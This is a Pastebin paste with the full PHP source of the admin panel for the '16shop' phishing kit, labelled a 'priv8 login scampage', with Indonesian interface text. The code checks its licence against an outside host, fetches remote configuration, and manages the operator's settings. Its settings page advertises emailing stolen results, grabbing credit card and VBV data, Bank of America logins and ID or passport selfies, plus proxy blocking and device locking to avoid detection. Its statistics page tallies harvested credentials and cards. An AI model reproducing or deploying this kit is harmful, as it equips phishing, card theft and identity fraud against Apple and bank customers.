API tools faq
paste
Advertisement
Ribang

panel admin

Ribang
May 5th, 2018 (edited)
25
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.07 KB | None | 0 0
raw download clone embed print report
  1. source:https://pastebin.com/raw/WC2b2ByP
  2.  
  3. output:
  4. ?><?php
  5. session_start();
  6. error_reporting(0);
  7. header("Content-Type: text/html; charset=UTF-8");
  8. $email = $_POST['email'];
  9. $password = $_POST['password'];
  10. $config = parse_ini_file('../key.ini');
  11. $key = $config['private_key'];
  12. $public_key = $config['public_key'];
  13. $page = $_GET['p'];
  14. $domain = preg_replace('/www\./i', '', $_SERVER['SERVER_NAME']);
  15. if (file_exists("../.config")){
  16. }else{
  17. $contents = load_conf();
  18. $tulis = fopen("../.config","a");
  19. fwrite($tulis,$contents);
  20. fclose($tulis);
  21. }
  22. ?>
  23. <html><head>
  24. <title>16shop - Admin Panel</title>
  25. <link rel="stylesheet" type="text/css" href="style.css"></head>
  26. <body>
  27. <?php if($page == "") {
  28. if(isset($_POST['email'])) {
  29. $login = login($_POST['email'], $_POST['password']);
  30. if($login == "valid") {
  31. $_SESSION['email'] = $_POST['email'];
  32. $_SESSION['password'] = $_POST['password'];
  33. }else{
  34. die("GAGAL LOGIN");
  35. }
  36. $valid = valid_key($domain,$key);
  37. if($valid == "valid") {
  38. echo "<script type='text/javascript'>window.top.location='?p=home';</script>";
  39. }else{
  40. echo "<script type='text/javascript'>window.top.location='?p=generate';</script>";
  41. }
  42. }
  43. if($public_key == "your_public_key") {
  44. echo '<br> <div class="content-center">
  45. <h2>## Enter your Public Key ##</h2>
  46. <form action="index.php?p=adduser" method="post">
  47. <div class="batas">
  48. <label><strong>Public Key</strong></label><br>
  49. <input style="width:320px;height:23px;" type="text" required="required" name="public_key" value="">
  50. </div>
  51. <div class="center">
  52. <input type="submit" class="button" value="Continue">
  53. </div>
  54. </form>
  55. </div>';
  56. }else{
  57. echo '<br> <div class="content-center">
  58. <h2>## priv8 login scampage ##</h2>
  59. <form method="post">
  60. <div class="batas">
  61. <label><strong>Email</strong></label><br>
  62. <input style="width:320px;height:23px;" type="email" required="required" name="email" value="">
  63. </div>
  64. <div class="batas">
  65. <label><strong>Password</strong></label><br>
  66. <input style="width:320px;height:23px;" type="password" required="required" name="password" value="">
  67. </div><br>
  68. <div class="center">
  69. <input type="hidden" name="token">
  70. <input type="submit" class="button" value="Masuk">
  71. </div>
  72. </form>
  73. </div>';
  74. }
  75. }
  76.  
  77. if($page == "adduser") {
  78. $click = "../key.ini";
  79. $fps = fopen($click, "r");
  80. $contents = fread($fps, filesize($click));
  81. fclose($fps);
  82.  
  83. $contents = str_replace("your_public_key",$_POST['public_key'],$contents);
  84. unlink("../key.ini");
  85. $tulis = fopen("../key.ini","a");
  86. fwrite($tulis,$contents);
  87. fclose($tulis);
  88. echo "<script type='text/javascript'>window.top.location='?p=';</script>";
  89. }
  90.  
  91. if($page == "home") {
  92. if(!isset($_SESSION['email'])) {
  93. die("DONT BYPASS IT!");
  94. }
  95. $valid = valid_key($domain,$key);
  96. if($valid == "valid") {
  97. $font = "<font color='green'><b>Active</font>";
  98. }else{
  99. $font = "<font color='red'><b>Inactive</font>";
  100. }
  101. echo '<br> <div class="content-center">
  102. <a href="?p=home">[Status]</a> <a href="?p=setting">[Setting]</a> <a href="?p=notice">[Notice]</a> <a href="?p=statistic">[Statistic]</a> <a href="?p=logout">[Logout]</a>
  103. <h2>## Status Domain ##</h2>
  104. <div class="batas">
  105. <label><strong>Domain</strong></label><br>
  106. <a href="https://'.$domain.'">'.$domain.'</a><br><br/>
  107. <label><strong>Status</strong></label><br>
  108. '.$font.'
  109. </div><br>
  110. </div>';
  111. }
  112.  
  113. if($page == "generate") {
  114. if(!isset($_SESSION['email'])) {
  115. die("DONT BYPASS IT!");
  116. }
  117. if(isset($_POST['domain'])) {
  118. if(!isset($_SESSION['email'])) {
  119. die("DONT BYPASS IT!");
  120. }
  121. $click = "../key.ini";
  122. $fps = fopen($click, "r");
  123. $contents = fread($fps, filesize($click));
  124. fclose($fps);
  125.  
  126. $contents = str_replace($key,sha1(md5($_POST['domain'])),$contents);
  127. unlink("../key.ini");
  128. unlink("../result/total_login.txt");
  129. unlink("../result/total_cc.txt");
  130. unlink("../result/total_photo.txt");
  131. unlink("../result/total_click.txt");
  132. unlink("../result/total_bank.txt");
  133. unlink("../result/log_visitor.txt");
  134. $tulis = fopen("../key.ini","a");
  135. fwrite($tulis,$contents);
  136. fclose($tulis);
  137.  
  138. $user = $_SESSION['email'];
  139. $pass = $_SESSION['password'];
  140. $domain = $_POST['domain'];
  141. $license = sha1(md5($domain));
  142. register_key($user,$pass,$license,$domain);
  143.  
  144. echo "<script type='text/javascript'>alert('Berhasil mendaftarkan domain');window.top.location='?p=home';</script>";
  145. }
  146. echo '<br> <div class="content-center">
  147. <a href="?p=generate">[Status]</a> <a href="?p=generate">[Setting]</a> <a href="?p=generate">[Notice]</a> <a href="?p=generate">[Statistic]</a> <a href="?p=logout">[Logout]</a>
  148. <h2>## Generate new key ##</h2>
  149. <p>Klik "Active" untuk mengaktifkan scampage</p>
  150. <form method="post">
  151. <div class="batas">
  152. <label><strong>Domain</strong></label><br>
  153. <a href="https://'.$domain.'">'.$domain.'</a>
  154. </div><br>
  155. <div class="center">
  156. <input type="hidden" name="domain" value="'.$domain.'">
  157. <input type="submit" class="button" value="Active">
  158. </div>
  159. </form>
  160. </div>';
  161. }
  162.  
  163. if($page == "setting") {
  164. if(!isset($_SESSION['email'])) {
  165. die("DONT BYPASS IT!");
  166. }
  167. if(isset($_POST['config'])) {
  168. if(!isset($_SESSION['email'])) {
  169. die("DONT BYPASS IT!");
  170. }
  171.  
  172. $contents = str_replace($key,sha1(md5($_POST['domain'])),$contents);
  173. unlink("../.config");
  174. $tulis = fopen("../.config","a");
  175. fwrite($tulis,$_POST['config']);
  176. fclose($tulis);
  177. echo "<script type='text/javascript'>alert('Berhasil Menyimpan Settingan');window.top.location='?p=setting';</script>";
  178.  
  179. }
  180. $setting = parse_ini_file('../.config');
  181. $click = "../.config";
  182. $file = fopen($click, "r");
  183. $contents = fread($file, filesize($click));
  184. fclose($file);
  185. echo '<br> <div class="content-center">
  186. <a href="?p=home">[Status]</a> <a href="?p=setting">[Setting]</a> <a href="?p=notice">[Notice]</a> <a href="?p=statistic">[Statistic]</a> <a href="?p=logout">[Logout]</a>
  187. <h2>## Setting your scampage ##</h2>
  188. <p>Klik "Save" untuk menyimpan konfigurasi</p>
  189. <p>1 = <font color="green">Aktif</font></p>
  190. <p>0 = <font color="red">Mati</font></p>
  191. <p>Keterangan:</p>
  192. <p>email = Email result kalian</p>
  193. <p>backup = Backup result ke file txt</p>
  194. <p>send_login = Mengirim result login ke email</p>
  195. <p>mix_result = Gabung Result Credit Card dan VBV</p>
  196. <p>proxy_block = Fitur block pengguna yang menggunakan proxy</p>
  197. <p>block = Block pengguna dan redirect ke situs apple setelah isi data</p>
  198. <p>site_password = Fitur site password, hanya redirect + password<br> kalian yang bisa akses scampage</p>
  199. <p>site_parameter = Fitur untuk membuka scampage dengan link khusus<br>ex: https://domainscampage.com/?16shop</p>
  200. <p>lock_lang = Fitur Lock Bahasa discampage (JP/CN/FR/ES) Defaultnya ALL</p>
  201. <p>grab_data = Mengambil data asli dari web resmi apple</p>
  202. <p>get_photo = Fitur Upload Photo Selfie ID/Driving License/Passport</p>
  203. <p>get_bank = Fitur Form Bank Login (Bank Of America)</p>
  204. <p>lock_platform = Fitur hanya pengguna Mac/iPhone/iPad/iPod yang<br> bisa bisa mengakses site</p>
  205. <p>double_cc = Fitur Input 2 Credit Card (1x Declined, 1x Valid)</p>
  206. <form method="post">
  207. <div class="batas">
  208. <label><strong>Config</strong></label><br>
  209. <textarea name="config" rows="25" cols="60">
  210. '.$contents.'
  211. </textarea>
  212. </div><br>
  213. <div class="center">
  214. <input type="submit" class="button" value="Save">
  215. </div>
  216. </form>
  217. </div>';
  218. }
  219.  
  220. if($page == "notice") {
  221. if(!isset($_SESSION['email'])) {
  222. die("DONT BYPASS IT!");
  223. }
  224. if(isset($_POST['noticeconfig'])) {
  225. if(!isset($_SESSION['email'])) {
  226. die("DONT BYPASS IT!");
  227. }
  228.  
  229. $contents = str_replace($key,sha1(md5($_POST['domain'])),$contents);
  230. unlink("../lang.ini");
  231. $tulis = fopen("../lang.ini","a");
  232. fwrite($tulis,$_POST['noticeconfig']);
  233. fclose($tulis);
  234. echo "<script type='text/javascript'>alert('Berhasil Menyimpan Settingan');window.top.location='?p=notice';</script>";
  235.  
  236. }
  237. $setting = parse_ini_file('../lang.ini');
  238. $click = "../lang.ini";
  239. $file = fopen($click, "r");
  240. $contents = fread($file, filesize($click));
  241. fclose($file);
  242. echo '<br> <div class="content-center">
  243. <a href="?p=home">[Status]</a> <a href="?p=setting">[Setting]</a> <a href="?p=notice">[Notice]</a> <a href="?p=statistic">[Statistic]</a> <a href="?p=logout">[Logout]</a>
  244. <h2>## Setting Notice ##</h2>
  245. <p>Klik "Save" untuk menyimpan konfigurasi</p>
  246. <form method="post">
  247. <div class="batas">
  248. <label><strong>Custom Notice</strong></label><br>
  249. <textarea name="noticeconfig" rows="25" cols="60">
  250. '.$contents.'
  251. </textarea>
  252. </div><br>
  253. <div class="center">
  254. <input type="submit" class="button" value="Save">
  255. </div>
  256. </form>
  257. </div>';
  258. }
  259.  
  260. if($page == "statistic") {
  261. if(!isset($_SESSION['email'])) {
  262. die("DONT BYPASS IT!");
  263. }
  264. $click = "../result/total_click.txt";
  265. $file = fopen($click, "r");
  266. $total_click = fread($file, filesize($click));
  267. $total_click = substr_count($total_click, "\n");
  268. fclose($file);
  269. if($total_click == 0) {
  270. $total_click = "<font color='red'>$total_click</font>";
  271. }else{
  272. $total_click = "<font color='green'>$total_click</font>";
  273. }
  274.  
  275. $click = "../result/total_login.txt";
  276. $file = fopen($click, "r");
  277. $total_login = fread($file, filesize($click));
  278. $total_login = substr_count($total_login, "\n");
  279. fclose($file);
  280. if($total_login == 0) {
  281. $total_login = "<font color='red'>$total_login</font>";
  282. }else{
  283. $total_login = "<font color='green'>$total_login</font>";
  284. }
  285.  
  286. $click = "../result/total_cc.txt";
  287. $file = fopen($click, "r");
  288. $total_cc = fread($file, filesize($click));
  289. $total_cc = substr_count($total_cc, "\n");
  290. fclose($file);
  291. if($total_cc == 0) {
  292. $total_cc = "<font color='red'>$total_cc</font>";
  293. }else{
  294. $total_cc = "<font color='green'>$total_cc</font>";
  295. }
  296.  
  297. $click = "../result/total_bank.txt";
  298. $file = fopen($click, "r");
  299. $total_bank = fread($file, filesize($click));
  300. $total_bank = substr_count($total_bank, "\n");
  301. fclose($file);
  302. if($total_bank == 0) {
  303. $total_bank = "<font color='red'>$total_bank</font>";
  304. }else{
  305. $total_bank = "<font color='green'>$total_bank</font>";
  306. }
  307.  
  308. $click = "../result/total_upload.txt";
  309. $file = fopen($click, "r");
  310. $total_photo = fread($file, filesize($click));
  311. $total_photo = substr_count($total_photo, "\n");
  312. fclose($file);
  313. if($total_photo == 0) {
  314. $total_photo = "<font color='red'>$total_photo</font>";
  315. }else{
  316. $total_photo = "<font color='green'>$total_photo</font>";
  317. }
  318.  
  319. $click = "../result/log_visitor.txt";
  320. $file = fopen($click, "r");
  321. $log_visitor = fread($file, filesize($click));
  322. fclose($file);
  323. echo '<br> <div class="content-center">
  324. <a href="?p=home">[Status]</a> <a href="?p=setting">[Setting]</a> <a href="?p=notice">[Notice]</a> <a href="?p=statistic">[Statistic]</a> <a href="?p=logout">[Logout]</a>
  325. <h2>## Statistic ##</h2>
  326. <p>Click : '.$total_click.'</p>
  327. <p>Login : '.$total_login.'</p>
  328. <p>Credit Card : '.$total_cc.'</p>
  329. <p>Bank (Bank Of America) : '.$total_bank.'</p>
  330. <p>Photo CC/ID : '.$total_photo.'</p>
  331. <textarea rows="20" cols="60" disabled>'.$log_visitor.'</textarea>
  332. <div class="center">
  333. <a href="?p=resetdata" class="button">Reset Data</a>
  334. </div>
  335. </div>';
  336. }
  337.  
  338. if($page == "logout") {
  339. session_destroy();
  340. echo "<script type='text/javascript'>window.top.location='?';</script>";
  341. }
  342.  
  343. if($page == "resetdata") {
  344. if(!isset($_SESSION['email'])) {
  345. die("DONT BYPASS IT!");
  346. }
  347. unlink("../result/total_login.txt");
  348. unlink("../result/total_cc.txt");
  349. unlink("../result/total_photo.txt");
  350. unlink("../result/total_click.txt");
  351. unlink("../result/total_bank.txt");
  352. unlink("../result/log_visitor.txt");
  353. echo "<script type='text/javascript'>window.top.location='?p=statistic';</script>";
  354. }
  355.  
  356. function login($username,$password) {
  357. $get = curl_init();
  358. $config = parse_ini_file('../key.ini');
  359. $key = $config['public_key'];
  360. curl_setopt($get, CURLOPT_URL,"http://16digit.shop/api/login.php");
  361. curl_setopt($get, CURLOPT_POST, 1);
  362. curl_setopt($get, CURLOPT_POSTFIELDS, "username=$username&password=$password&key=$key");
  363. curl_setopt($get, CURLOPT_RETURNTRANSFER, true);
  364. $server_output = curl_exec ($get);
  365. curl_close($get);
  366. return $server_output;
  367. }
  368.  
  369. function register_key($username,$password,$your_key,$domain) {
  370. $get = curl_init();
  371. $config = parse_ini_file('../key.ini');
  372. $key = $config['public_key'];
  373. $ip = $_SERVER['SERVER_ADDR'];
  374. curl_setopt($get, CURLOPT_URL,"http://16digit.shop/api/reg_key.php");
  375. curl_setopt($get, CURLOPT_POST, 1);
  376. curl_setopt($get, CURLOPT_POSTFIELDS, "username=$username&password=$password&key=$key&reg_key=$your_key&ip_reg=$ip&domain=$domain");
  377. curl_setopt($get, CURLOPT_RETURNTRANSFER, true);
  378. $server_output = curl_exec ($get);
  379. curl_close($get);
  380. return $server_output;
  381. }
  382. function valid_key($domain,$key) {
  383. $get = curl_init();
  384. curl_setopt($get, CURLOPT_URL,"http://16digit.shop/api/check_valid.php");
  385. curl_setopt($get, CURLOPT_POST, 1);
  386. curl_setopt($get, CURLOPT_POSTFIELDS, "domain=$domain&key=$key");
  387. curl_setopt($get, CURLOPT_RETURNTRANSFER, true);
  388. $server_output = curl_exec ($get);
  389. curl_close($get);
  390. return $server_output;
  391. }
  392.  
  393. function load_conf() {
  394. $get = curl_init();
  395. curl_setopt($get, CURLOPT_URL,"http://16digit.shop/api/scama/config.txt");
  396. curl_setopt($get, CURLOPT_RETURNTRANSFER, true);
  397. $server_output = curl_exec ($get);
  398. curl_close($get);
  399. return $server_output;
  400. }
  401. ?>
  402. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!